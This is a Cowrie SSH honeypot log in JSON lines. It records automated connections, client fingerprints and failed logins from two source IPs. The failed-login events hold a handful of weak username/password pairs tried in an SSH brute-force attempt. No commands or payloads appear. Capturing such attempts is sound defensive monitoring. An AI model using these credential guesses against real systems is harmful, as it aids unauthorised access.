{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:13:39.478750Z","src_ip":"212.227.235.229","session":"c98cd4208356"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":42190,"dst_ip":"1.2.3.4","dst_port":22,"session":"f529caa4099e","protocol":"ssh","message":"New connection: 103.217.145.104:42190 (1.2.3.4:22) [session: f529caa4099e]","sensor":"my-vps","timestamp":"2025-08-26T04:13:40.400035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:13:40.401023Z","src_ip":"103.217.145.104","session":"f529caa4099e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:13:40.667952Z","src_ip":"103.217.145.104","session":"f529caa4099e"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-26T04:13:41.071424Z","src_ip":"212.227.235.229","session":"c98cd4208356"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:13:41.078204Z","src_ip":"212.227.235.229","session":"4e3071515f84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57646,"dst_ip":"1.2.3.4","dst_port":22,"session":"03515cfeb458","protocol":"ssh","message":"New connection: 212.227.235.229:57646 (1.2.3.4:22) [session: 03515cfeb458]","sensor":"my-vps","timestamp":"2025-08-26T04:13:41.613940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:13:41.614813Z","src_ip":"212.227.235.229","session":"03515cfeb458"}
{"eventid":"cowrie.login.failed","username":"teste","password":"teste","message":"login attempt [teste/teste] failed","sensor":"my-vps","timestamp":"2025-08-26T04:13:41.771863Z","src_ip":"103.217.145.104","session":"f529caa4099e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:13:41.873853Z","src_ip":"212.227.235.229","session":"03515cfeb458"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:13:43.041774Z","src_ip":"103.217.145.104","session":"f529caa4099e"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:13:43.757136Z","src_ip":"212.227.235.229","session":"c98cd4208356"}
{"eventid":"cowrie.login.failed","username":"test","password":"teest","message":"login attempt [test/teest] failed","sensor":"my-vps","timestamp":"2025-08-26T04:13:44.158488Z","src_ip":"212.227.235.229","session":"03515cfeb458"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:13:45.419088Z","src_ip":"212.227.235.229","session":"03515cfeb458"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38360,"dst_ip":"1.2.3.4","dst_port":22,"session":"3418023af75d","protocol":"ssh","message":"New connection: 212.227.235.229:38360 (1.2.3.4:22) [session: 3418023af75d]","sensor":"my-vps","timestamp":"2025-08-26T04:13:49.784398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:13:49.785249Z","src_ip":"212.227.235.229","session":"3418023af75d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:13:50.062494Z","src_ip":"212.227.235.229","session":"3418023af75d"}
{"eventid":"cowrie.login.failed","username":"update","password":"update","message":"login attempt [update/update] failed","sensor":"my-vps","timestamp":"2025-08-26T04:13:51.210970Z","src_ip":"212.227.235.229","session":"3418023af75d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38216,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b65910ea623","protocol":"ssh","message":"New connection: 212.227.235.229:38216 (1.2.3.4:22) [session: 1b65910ea623]","sensor":"my-vps","timestamp":"2025-08-26T04:13:51.842103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:13:51.842896Z","src_ip":"212.227.235.229","session":"1b65910ea623"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:13:52.114116Z","src_ip":"212.227.235.229","session":"1b65910ea623"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:13:52.489768Z","src_ip":"212.227.235.229","session":"3418023af75d"}
{"eventid":"cowrie.login.failed","username":"secret","password":"secret","message":"login attempt [secret/secret] failed","sensor":"my-vps","timestamp":"2025-08-26T04:13:56.137638Z","src_ip":"212.227.235.229","session":"1b65910ea623"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:13:57.456052Z","src_ip":"212.227.235.229","session":"1b65910ea623"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55344,"dst_ip":"1.2.3.4","dst_port":22,"session":"4557d035214e","protocol":"ssh","message":"New connection: 212.227.235.229:55344 (1.2.3.4:22) [session: 4557d035214e]","sensor":"my-vps","timestamp":"2025-08-26T04:13:57.768888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:13:57.771614Z","src_ip":"212.227.235.229","session":"4557d035214e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:14:01.711536Z","src_ip":"212.227.235.229","session":"4557d035214e"}
{"eventid":"cowrie.login.failed","username":"tushar","password":"tushar123","message":"login attempt [tushar/tushar123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:14:05.382573Z","src_ip":"212.227.235.229","session":"4557d035214e"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:14:06.656969Z","src_ip":"212.227.235.229","session":"4557d035214e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59988,"dst_ip":"1.2.3.4","dst_port":22,"session":"fef8b0ad3cf9","protocol":"ssh","message":"New connection: 212.227.235.229:59988 (1.2.3.4:22) [session: fef8b0ad3cf9]","sensor":"my-vps","timestamp":"2025-08-26T04:14:12.191396Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55860,"dst_ip":"1.2.3.4","dst_port":22,"session":"569200bd1c09","protocol":"ssh","message":"New connection: 212.227.235.229:55860 (1.2.3.4:22) [session: 569200bd1c09]","sensor":"my-vps","timestamp":"2025-08-26T04:14:12.226174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:14:12.241477Z","src_ip":"212.227.235.229","session":"fef8b0ad3cf9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:14:12.635763Z","src_ip":"212.227.235.229","session":"569200bd1c09"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:14:12.666748Z","src_ip":"212.227.235.229","session":"569200bd1c09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47046,"dst_ip":"1.2.3.4","dst_port":22,"session":"a47bd3f940ad","protocol":"ssh","message":"New connection: 212.227.235.229:47046 (1.2.3.4:22) [session: a47bd3f940ad]","sensor":"my-vps","timestamp":"2025-08-26T04:14:14.014021Z"}
{"eventid":"cowrie.login.failed","username":"install","password":"install","message":"login attempt [install/install] failed","sensor":"my-vps","timestamp":"2025-08-26T04:14:14.047298Z","src_ip":"212.227.235.229","session":"569200bd1c09"}
